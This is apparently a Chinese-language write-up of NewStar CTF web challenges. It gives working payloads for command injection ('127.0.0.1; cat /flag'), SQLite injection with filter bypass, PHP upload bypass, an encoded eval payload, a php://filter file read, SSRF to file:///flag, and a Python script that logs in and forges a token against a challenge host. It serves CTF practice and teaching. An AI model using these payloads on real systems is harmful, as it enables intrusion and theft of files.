NewStar CTF Web 题解整理

先跳过前端限制，再去试弱口令，admin/111111 能登进去。

后端 PHP 这段更关键：

• 允许字符只有 0-9, *, /, ~, (, ), 空白
• 不能是纯数字或者纯空白
• 最后会 @eval("$test = $input;")，并判断 $test == 2025

组合一下，45*45 正好是 2025，直接过。

?newstar=45*45

flag：

flag{c6582a80-afdd-4ef9-8088-a15455bc30cf}

别笑，你也过不了第二关

难度：简单

前端游戏逻辑是可以直接改变量的，目标分数其实没什么约束。控制台里把分数拉满，再调用结束函数：

score = 1000000;
endLevel();

拿到 flag：

flag{8a6f2ab9-9b7e-4274-90bf-efbe94277b14}

Week 2

DD 加速器

难度：简单

命令执行很直接，在 ping 参数里拼命令就行：

127.0.0.1; cat /flag

flag：

flag{9cacf6f4-5cc9-4cef-99a8-97c51b2953be}

搞点哦润吉吃吃橘

难度：简单

登录页源码注释里直接把账号密码漏出来了：Doro/Doro_nJlPVs_@123。

登录后还得过一个 Token 校验，核心是时间戳和异或运算。这里手工算不划算，直接写脚本省事很多：

#!/usr/bin/env python3
# coding: utf-8
import requests
import re
import time
import sys

BASE = "https://eci-2ze6zyo0m8laq9swg77e.cloudeci1.ichunqiu.com:5000"
LOGIN_PATH = "/login"
START_PATH = "/start_challenge"
VERIFY_PATH = "/verify_token"
USERNAME = "Doro"
PASSWORD = "Doro_nJlPVs_%40123"

def login(session):
    url = BASE + LOGIN_PATH
    session.headers.update({"Origin": BASE, "Referer": BASE + "/login", "Content-Type": "application/x-www-form-urlencoded"})
    data = f"username={USERNAME}&password={PASSWORD}"
    resp = session.post(url, data=data, allow_redirects=False)
    return "Set-Cookie" in resp.headers and "session=" in resp.headers["Set-Cookie"]

def fetch_challenge(session):
    url = BASE + START_PATH
    resp = session.post(url)
    return resp.json()

def parse_and_compute_token(data):
    multiplier = int(data.get("multiplier")) if data.get("multiplier") else None
    xor_raw = data.get("xor_value")
    xor_value = int(xor_raw, 16) if isinstance(xor_raw, str) and xor_raw.lower().startswith("0x") else int(xor_raw)
    tsource = int(time.time())
    token = (tsource * multiplier) ^ xor_value
    return token

def submit_token(session, token):
    url = BASE + VERIFY_PATH
    resp = session.post(url, json={"token": token}, headers={"Content-Type": "application/json"})
    return resp

def main():
    s = requests.Session()
    if not login(s): return
    data = fetch_challenge(s)
    token = parse_and_compute_token(data)
    submit_token(s, token)

if __name__ == "__main__":
    main()

flag：

flag{c596b46c-3c82-4416-9e70-538104015062}

白帽小 K 的故事（1）

难度：困难

这是文件上传。前端只检查后缀，抓包把扩展名改成 .php 就能绕过去。

上传前先通过 /v1/onload 拿到实际上传路径，我这里先放一个 <?php phpinfo(); ?> 的测试文件，确认服务端确实会解析 PHP，再继续拿 flag。

flag{741a9681-2e6c-4486-b767-557e907c8863}

小 E 的管理系统

难度：困难

还是 SQL 注入，但过滤条件更烦：空格和单引号都被挡了，不过报错注入还能用。

处理顺序大致是这样：

1. 用 %0a 顶掉空格过滤
2. 先确认数据库类型是 SQLite
3. 探到列数是 5
4. 用 UNION SELECT 配合 sqlite_master 看表结构
5. 最后从 sys_config 里把 flag 拿出来

示例 payload：

-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0asqlite_version())%0aAS%0aB...

flag：

flag{1148f076-61cb-457a-818f-d910ef21b142}

真的是签到诶

难度：签到

题目给的是一套解码链：Base64 解码、Atbash 替换、去空格、ROT13，最后进 Eval。

思路不复杂，就是把 cat /flag 按这套流程反向编码回去。最终 payload 是：

u91d0glh(Kmrt\040/hbmg');

原文中的实际 Base64 串如下：

dW91dGlhKCJrbXRcMDQwL2hibWciKTs=

flag：

flag{8b3bf25f-b724-4f06-9197-ba25bd749249}

Week 3

ez-chain

难度：简单

这是任意文件读取。WAF 挡了 php、base64、data 这些关键字，而且读出来的内容里还不能出现 f，限制看着多，实际绕法还是那一套：双重编码配合 php://filter 和 rot13。

payload：

file=%25%37%30%25%36%38... (php://filter/string.rot13/resource=/flag 的双重编码)

flag：

flag{8847b675-528e-4ee8-aab6-ff3a854b53bc}

mygo!!!

难度：简单

这题是 SSRF。表面上限制了 HTTP 协议，还做了本地 IP 检查，但依旧能借内网穿透的方式绕过去。

最后让它去访问本地 flag.php，再借 file:///flag 伪协议读内容：

index.php?proxy=http://127.0.0.1/flag.php?soyorin=file:///flag

flag：

flag{a8fe31b5-aad7-4dc1-9bda-3e21daff103f}

小 E 的秘密计划

难度：简单

这题是 Git 泄露叠加 Mac 系统文件泄露。

先找到 .git，把被删掉的 user.php 恢复出来，账号密码也就出来了。登录后台后，再顺手扫一下 .DS_Store，里面还能再挖出一段 flag 相关信息。

flag{e08813e1-a595-464c-85c5-67b474f83601}

mirror_gate

难度：中等

文件上传题，后端对文件类型和内容都有校验，常规 php 后缀不好混过去。不过 .webp 这种图片格式可以塞代码，关键在于把 PHP 片段放进能被解析的位置。

把 PHP 代码写进 .webp 文件头或元数据里，上传后访问即可。

flag{fd8af3ec-7983-4724-ad82-e3f84149346f}

who'ssti

难度：中等

这是 Flask 模板注入。题目不是那种直接 {{7*7}} 的低配题，得先想办法把调用链拉出来，再借内置函数走到 __import__。

最后是通过对象遍历和 Trace 回调收集函数调用列表，拼出可用路径拿到 Flag。

flag{12c4c60d-6a52-4515-85a0-90052c4e6b2b}

白帽小 K 的故事（2）

难度：中等

盲注 SQL。空格被过滤了，但括号还能用，够用了。

我这里是直接写 Python 脚本做布尔盲注，按位枚举数据库名、表名、列名和最终数据。手工点页面也能做，就是慢，而且容易把自己点烦。

flag{b2f00fa9-8d65-45ac-9193-8a852c4910fb}